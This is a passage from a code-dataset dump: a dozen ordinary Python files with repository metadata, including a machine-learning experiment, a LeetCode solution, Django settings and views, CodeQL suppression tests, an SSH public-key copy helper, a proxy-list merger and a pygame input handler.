blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7cbadac299d6d1aa1aa7c1bf6d8c12eef42f1ec9
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/dnce/synth8.py
|
09101dc78c48d9e56e0944a1335bcecf7fe268ec
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189
| 2018-12-12T16:27:09
| 2018-12-12T16:27:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,399
|
py
|
#An experiment with synthetic data to test whether DNCE works.
#For the data-dependent noise model we use additive gaussian noise
#The data is just samples from a zero mean, unit precision univariate
#gaussian. We initialize the model with the wrong precision and see
#how close we can come to recovering the correct precision, and which
#noise precisions are the best.
#Imports
from matplotlib import pyplot as plt
from pylearn2.optimization.batch_gradient_descent import BatchGradientDescent
from pylearn2.models.mnd import DiagonalMND
from pylearn2.models.mnd import kl_divergence
from pylearn2.distributions.mnd import MND
from pylearn2.distributions.mnd import AdditiveDiagonalMND
import numpy as np
from pylearn2.utils import sharedX
from theano import function
from pylearn2.costs.ebm_estimation import NCE
from galatea.dnce.dnce import DNCE
import theano.tensor as T
#====Options controlling the experiment=========
#the dimension of the data
dim = 100
#number of training examples
m = 20
#number of noise examples per training example
noise_per_clean = 30
#the parameters of the data distribution
true_mu = 1.
true_beta = 1.
#for each of the noise components, we try
#num_beta different values of beta, spaced
#uniformly in log space from 10^min_exp
#to 10^max_exp
num_beta = 5
min_exp = -.5
max_exp = 0.1
#number of trials to run
trials = 3
#Generate the values of beta to consider
idxs = np.arange(num_beta)
pos = idxs / float(num_beta-1)
scaled_shifted = pos * (max_exp-min_exp) + min_exp
betas = 10 ** scaled_shifted
kls = np.zeros((trials,num_beta))
ml_kls = np.zeros((trials,))
for trial in xrange(trials):
#generate the data
data_distribution = MND( sigma = np.identity(dim) / true_beta,
mu = np.zeros((dim,)), seed = 17 * (trial+1) )
true = DiagonalMND( nvis = dim, init_beta = true_beta, init_mu = 0.,
min_beta = .1, max_beta = 10.)
X = sharedX(function([],data_distribution.random_design_matrix(m))())
Xv = X.get_value()
mu = Xv.mean(axis=0)
print 'maximum likelihood mu: ',mu
diff = Xv - mu
var = np.square(diff).mean(axis=0)
mlbeta = 1./var
print 'maximum likelihood beta: ',mlbeta
ml_model = DiagonalMND( nvis = dim, init_mu = mu, init_beta = mlbeta,
min_beta = 0.0,
max_beta = 1e6)
ml_kl = kl_divergence( true, ml_model)
ml_kl = function([],ml_kl)()
assert ml_kl >= 0.0
ml_kls[trial] = ml_kl
print 'maximum likelihood kl divergence:',ml_kl
best_mse = None
#Try each noise beta
for idx1 in xrange(num_beta):
beta = betas[idx1]
print 'Running experiment for ',beta
#Allocate a fresh model
model = DiagonalMND(
nvis = dim,
init_mu = 0.,
init_beta = .1,
min_beta = .001,
max_beta = 1e30)
#Make the noise distribution
noise_distribution = AdditiveDiagonalMND(
init_beta = beta,
nvis = dim
)
#generate the noise samples
noise_func = function([], noise_distribution.random_design_matrix(T.zeros_like(X)))
Y = []
for i in xrange(noise_per_clean):
Y.append(sharedX(noise_func()))
#Get the objective function
nce = NCE( DiagonalMND( nvis = dim,
init_beta = beta, init_mu = 0.,
min_beta = beta,
max_beta = beta),-1)
J = nce(model,X,T.concatenate(Y,axis=0))
#Add DNCE
#Make the noise distribution
noise_distribution = AdditiveDiagonalMND(
init_beta = 100.,
nvis = dim
)
#generate the noise samples
noise_func = function([], noise_distribution.random_design_matrix(X))
Y = []
for i in xrange(noise_per_clean):
Y.append(sharedX(noise_func()))
#Get the objective function
dnce = DNCE(noise_distribution)
J = J + dnce(model,X,Y)
#Minimize the objective function with batch gradient descent
minimizer = BatchGradientDescent( objective = J,
params = model.get_params(),
param_constrainers = [ model.censor_updates ])
print '\tinit obj:',minimizer.obj()
#minimizer.verbose = True
minimizer.minimize()
print '\tfinal obj:',minimizer.obj()
recovered_beta = model.beta.get_value()
recovered_mu = model.mu.get_value()
print '\trecovered beta:',recovered_beta
print '\trecovered mu:',recovered_mu
kl = kl_divergence(true, model)
kl = function([],kl)()
assert kl >= 0.0
print '\tkl was ',kl
kls[trial,idx1] = kl
plt.hold(True)
plt.plot(betas, kls.mean(axis=0),'b')
plt.plot(betas, kls.mean(axis=0)+kls.std(axis=0),'b--')
plt.plot(betas, kls.mean(axis=0)-kls.std(axis=0),'b--')
plt.plot(betas, ml_kls.mean() *np.ones((num_beta,)),'g')
plt.plot(betas, (ml_kls.mean()+ml_kls.std()) *np.ones((num_beta,)),'g--')
plt.plot(betas, (ml_kls.mean()-ml_kls.std()) *np.ones((num_beta,)),'g--')
plt.ylabel('KL divergence')
plt.xlabel('Noise precision')
ax = plt.gca()
ax.set_xscale('log')
plt.show()
|
[
"goodfellow.ian@gmail.com"
] |
goodfellow.ian@gmail.com
|
2aecf525c7041dcb9c7c2cf97f75b7d1334847e7
|
e2ae5c6d1d3ff9c512d526b1b4d7d7b64d50e87d
|
/py/leetcode/405.py
|
f3f4193e0aac1cae5a84217d9e3aab33fa3a9ee4
|
[] |
no_license
|
wfeng1991/learnpy
|
59ed66d0abc2947c2f73c0bfe3901ef45ba5eb56
|
e5b018493bbd12edcdcd0434f35d9c358106d391
|
refs/heads/master
| 2021-01-23T07:35:08.376547
| 2018-09-28T02:16:31
| 2018-09-28T02:16:31
| 86,430,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,278
|
py
|
class Solution(object):
def toHex(self, num):
"""
:type num: int
:rtype: str
"""
if num==0:
return '0'
d = {'0000':'0',
'0001':'1',
'0010':'2',
'0011':'3',
'0100':'4',
'0101':'5',
'0110':'6',
'0111':'7',
'1000':'8',
'1001':'9',
'1010':'a',
'1011':'b',
'1100':'c',
'1101':'d',
'1110':'e',
'1111':'f'}
i=0
r=''
m=1
t=''
while i<32:
t=str((num>>i) & m)+t
i+=1
if i%4==0:
r+=d[t]
t=''
r = r[::-1]
n0=0
for c in r:
if c=='0':
n0+=1
else:
break
return r[n0:]
def toHex1(self, num):
"""
:type num: int
:rtype: str
"""
if num == 0:
return '0'
HEX = '0123456789abcdef'
cnt = 0
output = ''
while num != 0 and cnt < 8:
output = HEX[num & 0xF] + output
num = num >> 4
cnt += 1
return output
print(Solution().toHex(0))
|
[
"jkwangfeng@qq.com"
] |
jkwangfeng@qq.com
|
1496d3188e68081c95d6988cf1f24525fc62d41d
|
2fc6766f36a9f8c0abc536d7c582102315bce1ba
|
/services/common/msg_service.py
|
e95e8e47df679ced6c81046bc1978d23e4e00521
|
[
"MIT"
] |
permissive
|
freedream520/loonblog
|
0cb153f28c14cced89738e297ee909494ba057b6
|
63d1f06d04047f220f550de914e542f535bb61a3
|
refs/heads/master
| 2021-06-22T13:53:24.492717
| 2017-08-25T01:53:33
| 2017-08-25T01:53:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
import os
import multiprocessing
from multiprocessing import Process
from django.core.mail import send_mail,EmailMultiAlternatives
from services.base_service import BaseService
from services.common.auto_log_service import auto_log
import logging
logger = logging.getLogger('default')
class MsgService(BaseService):
"""
消息服务
"""
def __init__(self):
pass
@staticmethod
@auto_log
def send_email_by_process(subject, content, mail_to_list):
"""
发送邮件
:param subject:
:param content:
:param mail_to_list:收件人
:return:
"""
# logger.info('同步发送')
# a = send_mail(subject, content, 'LOONAPP<loonapp@163.com>', mail_to_list)
# logger.info(a)
# logger.info('后台发送')
logger.info('发送邮件:{}-{}-{}'.format(subject, content, mail_to_list))
p = multiprocessing.Process(target=send_mail, args=(subject, content, 'LOONAPP<loonapp@163.com>', mail_to_list))
p.start()
return True, ''
@staticmethod
@auto_log
def send_multi_email_by_process(subject, content, mail_to_list):
logger.info('发送html邮件:{}-{}-{}'.format(subject, content, mail_to_list))
msg = EmailMultiAlternatives(subject, content,from_email='LOONAPP<loonapp@163.com>',to=mail_to_list)
msg.content_subtype = "html"
p = multiprocessing.Process(target=msg.send, args=())
p.start()
if __name__ == '__main__':
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings.dev")
MsgService().send_email_by_process('test', 'testt',['blackholll@163.com'])
MsgService().send_multi_email_by_process('test', '<a href="http://www.baidu.com">百度</a>',['blackholll@163.com'])
|
[
"blackholll@163.com"
] |
blackholll@163.com
|
d728ab2d2395985d3d16ea123321c8da086c8be3
|
e9744e750f02674235bb2748bf6b2f88b2b6015e
|
/python/ql/test/query-tests/analysis/suppression/test.py
|
17c495ff1a44ed622ff66cbb2aadb5b62b51767e
|
[
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"MIT"
] |
permissive
|
lecoursen/codeql
|
88b9887cfa3021b19aa3fa881ec2fc0160dc8ce7
|
0f710b1981031a00f8f223effe57a7da5e66b727
|
refs/heads/main
| 2023-04-02T21:08:39.295521
| 2021-03-29T17:18:45
| 2021-03-29T17:18:45
| 352,731,731
| 12
| 0
|
MIT
| 2021-03-29T17:40:05
| 2021-03-29T17:40:05
| null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
# Formatting tests:
"" # lgtm
"" # lgtm[py/line-too-long]
"" # lgtm[py/line-too-long, py/non-callable-called]
"" # lgtm[@tag:security]
"" # lgtm[@tag:security,py/line-too-long]
"" # lgtm[@expires:2017-06-11]
"" # lgtm[py/non-callable-called] because I know better than lgtm
"" # lgtm: blah blah
"" # lgtm blah blah #falsepositive
"" # lgtm blah blah -- falsepositive
"" #lgtm [py/non-callable-called]
"" # lgtm[]
"" # lgtmfoo
"" #lgtm
"" # lgtm
"" # lgtm [py/line-too-long]
"" # lgtm lgtm
#lgtm -- Ignore this -- No line or scope.
#On real code:
def foo(): #lgtm [func]
# lgtm -- Blank line (ignore for now, maybe scope wide in future).
"docstring" # lgtm on docstring
return { #lgtm [py/duplicate-key-in-dict]
"a": 1,
"a": 2
}
class C: # lgtm class
def meth(self): # lgtm method
pass
"" #noqa
"" # noqa
"The following should be ignored"
"" # flake8: noqa
"" # noqa: F401
"" # noqa -- Some extra detail.
"" #Ignore
#Suppression for multiple tools
#LGTM-1929
class frozenbidict(BidictBase): # noqa: E501; (line too long) pylint: disable=invalid-name; lgtm [py/missing-equals]
pass
"" # noqa: E501; (line too long) pylint: disable=invalid-name; lgtm
"" # random nonsense lgtm [py/missing-equals] and then some more commentary...
# Case insensitive comments
"" # LGTM
"" # LGTM[py/line-too-long]
#Avoid some erroneous matches
"" # foolgtm[py/missing-equals]
"" # foolgtm
"" # lgtm[py/line-too-long] and lgtm[py/non-callable-called]
"" # lgtm[py/line-too-long]; lgtm
|
[
"mark@hotpy.org"
] |
mark@hotpy.org
|
d9c24f7f6e438efd40050a757067aa092a6f3a23
|
c083825cabec4920e3e24ea79d907112b1b3497d
|
/bin/sshtool.py
|
876c0c2e650d46eeeb54cfbaa7509a8c1a1ade80
|
[] |
no_license
|
fsxchen/ssh-tool
|
bf767187c8c8354a39dc1f6e211fe96999cafec8
|
b5e65b4f071ff7494d8c75a7885d8acc70701c54
|
refs/heads/master
| 2021-01-18T22:47:36.032425
| 2016-11-23T09:40:27
| 2016-11-23T09:40:27
| 62,549,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,740
|
py
|
#!/usr/bin/env python
#coding:utf-8
import os
import sys
import pwd
import getpass
from paramiko import SSHClient
from paramiko import AutoAddPolicy, SSHException
client = SSHClient()
# client.load_system_host_keys()
LOCAL_USER_NAME = pwd.getpwuid(os.getuid()).pw_name
def sync_public_key(host, port=22, username=None, password=None):
try:
client = SSHClient()
client.connect(hostname=host, username=username, password=password)
except SSHException, e:
client.close()
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
client.connect(hostname=host, username=username, password=password)
sftp_client = client.open_sftp()
id_rsa_pub = "/home/%s/.ssh/id_rsa.pub" % LOCAL_USER_NAME
if username == "root":
remote_rsa_pub = "/root/.ssh/%s.pub" % (LOCAL_USER_NAME)
else:
remote_rsa_pub = "/home/%s/.ssh/%s.pub" % (username, LOCAL_USER_NAME)
print remote_rsa_pub
try:
sftp_client.put(id_rsa_pub , remote_rsa_pub)
except Exception, e:
"""
if the remote host did have .ssh dirctory
"""
print e
remote_authorized_keys = os.path.join(os.path.dirname(remote_rsa_pub), "authorized_keys")
remote_cmd = "cat %s >> %s && echo OK" % (remote_rsa_pub, remote_authorized_keys)
stdin, stdout, stderr = client.exec_command(remote_cmd)
# pirnt stdin
else:
print("OK!")
def main():
import sys
username, ip = None, None
if len(sys.argv) < 2:
print("usage: %s <ipaddress>" % sys.argv[0])
sys.exit(-1)
if "@" in sys.argv[1]:
username, ip = sys.argv[1].split("@")
else:
ip = sys.argv[1]
if not username:
username = raw_input("Input username:")
pwd = getpass.getpass("password:")
sync_public_key(ip, 22, username, pwd)
if __name__ == '__main__':
main()
|
[
"--global"
] |
--global
|
2c8a7ffc46f660df02634a1f90d9b9bf6f612e88
|
d8a1e25c1af97abc651e1fc7883adb201c85eac2
|
/income/urls.py
|
ac6abd25555e12b9f704c72ad1ea0d459fb5822c
|
[] |
no_license
|
taeheechoi/python-incomeexpense-api
|
710709fa29418f038e9dd68f453eec3d43e646a6
|
c3f95d7c02ab897f6b7ccb0fdca184c4fb877aa3
|
refs/heads/main
| 2023-07-13T21:03:43.876212
| 2021-08-16T01:37:02
| 2021-08-16T01:37:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 208
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.IncomeListAPIView.as_view(), name='incomes'),
path('<int:id>', views.IncomeDetailAPIView.as_view(), name='income'),
]
|
[
"dadac76@hotmail.com"
] |
dadac76@hotmail.com
|
8e51c1b3480b0e04785035065d04d12fb381a05b
|
2a922e742c5a914b8eea504f992b2f253944cb4f
|
/Importing-data-in-python-part-2_course6/importing-data-from-the-internet_lesson-1/Turning_a_webpage_into_data_using_BeautifulSoup_getting_the_hyperlinks.py
|
86a757203ef257a2004b34601ef84f4981427a5d
|
[] |
no_license
|
anujaraj10/DataCampPythonCourses
|
f2bc7a0d4062c056f920c45fbd454227874aca1f
|
51e74bf15703dfeae49ab1c64c5e680819a425cc
|
refs/heads/master
| 2021-08-16T22:04:53.310531
| 2017-11-20T11:11:22
| 2017-11-20T11:11:22
| 108,404,625
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
#In this exercise, you'll figure out how to extract the URLs of the hyperlinks from the BDFL's webpage. In the process, you'll become close #friends with the soup method find_all().
#Instructions
#Use the method find_all() to find all hyperlinks in soup, remembering that hyperlinks are defined by the HTML tag <a>; store the result in the #variable a_tags.
#The variable a_tags is a results set: your job now is to enumerate over it, using a for loop and to print the actual URLs of the hyperlinks; to #do this, for every element link in a_tags, you want to print() link.get('href').
# Import packages
import requests
from bs4 import BeautifulSoup
# Specify url
url = 'https://www.python.org/~guido/'
# Package the request, send the request and catch the response: r
r = requests.get(url)
# Extracts the response as html: html_doc
html_doc = r.text
# create a BeautifulSoup object from the HTML: soup
soup = BeautifulSoup(html_doc)
# Print the title of Guido's webpage
print(soup.title)
# Find all 'a' tags (which define hyperlinks): a_tags
a_tags = soup.find_all('a')
# Print the URLs to the shell
for link in a_tags:
print(link.get('href'))
|
[
"anujaraj10@gmail.com"
] |
anujaraj10@gmail.com
|
98ea4e85d3a130b7d8ed60081050f61defefe8fe
|
34ef83114e02b173bd2d55eb53ad399e738a8e3c
|
/django/search2/sample_app/sample_app/settings.py
|
76e5f88c03cc4cee9ab9e147c3eecc5b148713bc
|
[] |
no_license
|
vavilon/Python3
|
e976a18eb301e4953696d1e3f4730ed890da015a
|
8c79729747ce51d60ad685e6a2e58292954ed7eb
|
refs/heads/master
| 2023-01-09T13:44:37.408601
| 2018-01-25T22:41:14
| 2018-01-25T22:41:14
| 100,892,055
| 0
| 1
| null | 2022-12-26T20:29:27
| 2017-08-20T22:23:06
|
Python
|
UTF-8
|
Python
| false
| false
| 3,220
|
py
|
"""
Django settings for sample_app project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
lib_path = os.path.abspath(os.path.join(BASE_DIR, '../'))
sys.path.append(lib_path)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*&z9_n^drew!pd)znnyfvhp9#uk)i&)di=7^8buvjktc243*q0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'actors',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sample_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sample_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
[
"overon4ek@gmail.com"
] |
overon4ek@gmail.com
|
a50bdabdce5a97a9861b18e6086594080a3a8d8e
|
03abf1d207d8e2d2f9387617dcf7cd49663cf41d
|
/tests/test_array.py
|
5100f412a996f6570749db525fd3c809235b2093
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mgeier/sfs-python
|
8cd1bd3d7fd2737de53fdf78d3cbfd1d0b89297f
|
c89f53d08a1f631e41dfe39f6cafe57c8ca48055
|
refs/heads/master
| 2021-07-13T18:02:01.732602
| 2019-09-04T12:45:40
| 2019-09-04T12:45:40
| 228,433,867
| 0
| 0
|
MIT
| 2019-12-16T16:58:08
| 2019-12-16T16:58:07
| null |
UTF-8
|
Python
| false
| false
| 2,107
|
py
|
import numpy as np
from numpy.testing import assert_array_equal
import pytest
import sfs
def vectortypes(*coeffs):
return [
list(coeffs),
tuple(coeffs),
np.array(coeffs),
np.array(coeffs).reshape(1, -1),
np.array(coeffs).reshape(-1, 1),
]
def vector_id(vector):
if isinstance(vector, np.ndarray):
return 'array, shape=' + repr(vector.shape)
return type(vector).__name__
@pytest.mark.parametrize('N, spacing, result', [
(2, 1, sfs.array.SecondarySourceDistribution(
x=[[0, -0.5, 0], [0, 0.5, 0]],
n=[[1, 0, 0], [1, 0, 0]],
a=[1, 1],
)),
(3, 1, sfs.array.SecondarySourceDistribution(
x=[[0, -1, 0], [0, 0, 0], [0, 1, 0]],
n=[[1, 0, 0], [1, 0, 0], [1, 0, 0]],
a=[1, 1, 1],
)),
(3, 0.5, sfs.array.SecondarySourceDistribution(
x=[[0, -0.5, 0], [0, 0, 0], [0, 0.5, 0]],
n=[[1, 0, 0], [1, 0, 0], [1, 0, 0]],
a=[0.5, 0.5, 0.5],
)),
])
def test_linear_with_defaults(N, spacing, result):
a = sfs.array.linear(N, spacing)
assert a.x.dtype == np.float64
assert a.n.dtype == np.float64
assert a.a.dtype == np.float64
assert_array_equal(a.x, result.x)
assert_array_equal(a.n, result.n)
assert_array_equal(a.a, result.a)
def test_linear_with_named_arguments():
a = sfs.array.linear(N=2, spacing=0.5)
assert_array_equal(a.x, [[0, -0.25, 0], [0, 0.25, 0]])
assert_array_equal(a.n, [[1, 0, 0], [1, 0, 0]])
assert_array_equal(a.a, [0.5, 0.5])
@pytest.mark.parametrize('center', vectortypes(-1, 0.5, 2), ids=vector_id)
def test_linear_with_center(center):
a = sfs.array.linear(2, 1, center=center)
assert_array_equal(a.x, [[-1, 0, 2], [-1, 1, 2]])
assert_array_equal(a.n, [[1, 0, 0], [1, 0, 0]])
assert_array_equal(a.a, [1, 1])
@pytest.mark.parametrize('orientation', vectortypes(0, -1, 0), ids=vector_id)
def test_linear_with_center_and_orientation(orientation):
a = sfs.array.linear(2, 1, center=[0, 1, 2], orientation=orientation)
assert_array_equal(a.x, [[-0.5, 1, 2], [0.5, 1, 2]])
|
[
"Matthias.Geier@gmail.com"
] |
Matthias.Geier@gmail.com
|
4ece04618e14620c18d05f65a12122fcf3f71fca
|
996fd22214f9d83ecdb0163e6f38568c4596bf56
|
/union.py
|
88c0950145a20502c5634d6cac8d9a5bdd7d913c
|
[] |
no_license
|
1024Person/ProxyPool
|
cdabe5d6e29fd98109e4ae1dbb86391bb511310f
|
1ec3a79ca02f5e7d6d3d39bb34d6ba922a217a55
|
refs/heads/master
| 2023-03-21T19:16:30.370551
| 2021-03-14T05:24:52
| 2021-03-14T05:24:52
| 344,514,686
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
# 整合模块
# 发现在扩展的时候,因为这个只调用调度模块,导致第二个调度模块的检查器会将之前检查的代理ip再次检查一遍这样非常的费事,
# 已经检查过一次了就不需要在重复检查了,所以这里有两个解决方案:
# 1、重构scheduler模块,让他可以实现多个爬取器,然后一个检查器
# 2、添加整合模块,将每一个调度器的爬取器,爬去下来的ip存放到不同的文件中,然后检查的时候也只是检查这个调度器下的文件中的ip,
# 所有的调度器都结束工作之后,利用整合模块将所有文件中的ip整合到一个文件中
import sys
import os
import pandas as pd
from scheduler import Scheduler
import extension
from setting import csv_file_path
class Union(object):
# 参数 file_list: 需要整合的文件路径列表
# 参数 is_del_file : 是否需要删除中间文件,默认为不删除
def __init__(self,file_list,is_del_file = False):
# self.save = SaveIp()
self.file_list = file_list
self.perpare_work()
self.is_del_file = is_del_file
# 检查工作:检查传入的file_list中的文件是否都存在,
# 将不存在的文件路径移除删除
def perpare_work(self):
self.file_list = list(set(self.file_list))
for path in self.file_list:
if not os.path.exists(path):
self.file_list.remove(path)
def run(self):
# save = SaveIp(mode='a')
df = pd.DataFrame(data=[],columns=["ip","scores"])
for file_path in self.file_list:
file_ips = self.read(file_path)
if file_ips is not None:
df = df.append(file_ips)
# scores = [10 for _ in range(len(ips))]
# df = pd.DataFrame({"ip":ips,"scores":scores})
df.to_csv(csv_file_path,index=None,mode='a',columns=None,header=False) # 都保存到混沌代理池中
print("文件整合成功")
if self.is_del_file:
print("正在删除临时文件。。。")
self.delete_file()
print("临时文件删除成功")
def delete_file(self):
for file_path in self.file_list:
print(f"正在删除{file_path}")
os.remove(file_path)
def read(self,file_path):
try:
dt = pd.read_csv(file_path)
dt.columns=["ip","scores"]
return dt
except:
return None
if __name__ == "__main__":
current_path = os.path.dirname(os.path.abspath(__file__))
# f_path = current_path+"\\89_ip.csv"
f_name = ["\\qingting.csv",'\\kuai.csv',"\\89_ip.csv","\\tomato.csv"]
f_path_list = [current_path+_ for _ in f_name]
kuai_scheduler = Scheduler(ip_from="web",base_url=extension.kuai_base_url,crawler_parse_fn=extension.kuai_parse,crawler_pages=200,save_m="a",save_path=f_path_list[1],client_path=f_path_list[1],name="快代理调度器")
kuai_scheduler.start_scheduler()
kuai_scheduler.shutdown()
qingting_scheduler = Scheduler(ip_from="web",base_url=extension.qingting_base_url,crawler_pages=4,crawler_parse_fn=extension.qingting_parse,save_path=f_path_list[0],save_m="a",client_path=f_path_list[0],name="蜻蜓代理调度器")
qingting_scheduler.start_scheduler()
qingting_scheduler.shutdown()
_89_scheduler = Scheduler(ip_from='web',base_url=extension._89_base_url,crawler_pages=10,crawler_parse_fn=extension._89_parse,save_m='a',save_path=f_path[1],client_path=f_path[1],name="89代理调度器")
_89_scheduler.start_scheduler()
_89_scheduler.shutdown()
tomato_scheduler = Scheduler(ip_from='web',base_url=extension._89_base_url,crawler_pages=10,crawler_parse_fn=extension._89_parse,save_m='a',save_path=f_path[2],client_path=f_path[2],name="番茄代理调度器")
tomato_scheduler.start_scheduler()
tomato_scheduler.shutdown()
union = Union(f_path_list,True)
union.run()
|
[
"239903524@qq.com"
] |
239903524@qq.com
|
e995a49bf1c95011475c2e732e5b352d136705b9
|
5b8d55b89f7f33e1a2dcdd36e406eee8334e4678
|
/convert.py
|
f0a9ce47e91333881d030eebe5a88d1e59fa885e
|
[] |
no_license
|
manasRK/document_rating
|
b9fda56511d8cbe0a438a924718ca1e6fb63a154
|
e3caced4586c058d8239235cfe44fac6802e097f
|
refs/heads/master
| 2020-04-08T17:33:07.090176
| 2015-11-12T07:12:36
| 2015-11-12T07:12:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
__author__ = 'NLP-PC'
from load_data import load_pickle
from save_data import dump_picle
def convert(source_file):
s = load_pickle(source_file)
dump_picle(s, str(source_file)[:-2] + '_v2.7.p', protocol=2)
convert('./web_api/embedding_matrix_CVAT.p')
convert('./web_api/word_idx_map_CVAT.p')
|
[
"yunchaohe@gmail.com"
] |
yunchaohe@gmail.com
|
e6ba65eb534a04b8a0a6d2d01a017523e94bf4b8
|
547df2c76e6c3f4b7ac84441a14541eb0122f369
|
/input.py
|
bd899bfd115eddce0a04a80fcaedc1ff8b53ab29
|
[] |
no_license
|
daeken/space_game
|
8fa0d727faa7bb79f802546ca530f70312c3e48a
|
a02195f2ea9f442d5775ec75caa3464a3fa001de
|
refs/heads/master
| 2021-01-15T17:29:30.210249
| 2010-09-09T04:06:25
| 2010-09-09T04:06:25
| 897,841
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,164
|
py
|
import pygame
MOVE_DOWN = 1
MOVE_UP = 2
MOVE_LEFT = 4
MOVE_RIGHT = 8
class Input:
def __init__(self, spaceship):
self.spaceship = spaceship
pygame.key.set_repeat(1, 500)
pygame.mouse.set_visible(False)
def Handler(self, event):
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP:
self.spaceship.Move(MOVE_UP)
elif event.key == pygame.K_DOWN:
self.spaceship.Move(MOVE_DOWN)
elif event.key == pygame.K_LEFT:
self.spaceship.Move(MOVE_LEFT)
elif event.key == pygame.K_RIGHT:
self.spaceship.Move(MOVE_RIGHT)
elif event.unicode == ' ':
self.spaceship.Fire()
elif event.unicode == 's':
self.spaceship.Fire()
elif event.key == pygame.K_ESCAPE:
return False
elif event.type == pygame.MOUSEMOTION:
self.spaceship.pos = list(event.pos)
elif event.type == pygame.MOUSEBUTTONDOWN:
self.spaceship.Fire()
elif event.type == pygame.QUIT:
return False
return True
|
[
"cody.brocious@gmail.com"
] |
cody.brocious@gmail.com
|
672fa16630e8a40cf8b1e7b43f8c5612ba1a17f4
|
25b4fc4a54faf0f4217f3661477fa8f26cd60164
|
/Basket/views.py
|
2bcc37ebdf2ff013c67b218b2632fbe21f46d96d
|
[] |
no_license
|
AshtiNematian/Book_Store_Nematian_
|
6f601f69f0a25522ac351e4ad963f17011254289
|
b83ea7319dbead2be5812e2d001c58e7d906fff9
|
